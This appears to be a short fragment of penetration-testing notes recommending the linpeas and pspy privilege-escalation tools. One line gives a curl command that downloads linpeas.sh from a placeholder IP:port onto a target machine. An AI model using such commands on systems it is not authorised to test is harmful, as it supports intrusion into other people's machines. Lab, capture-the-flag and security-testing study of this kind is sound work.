• Use linpeas

  • Use pSpy

  • If you canโ€™t use wget, try this with curl; curl -o filename http://IP:port/linpeas.sh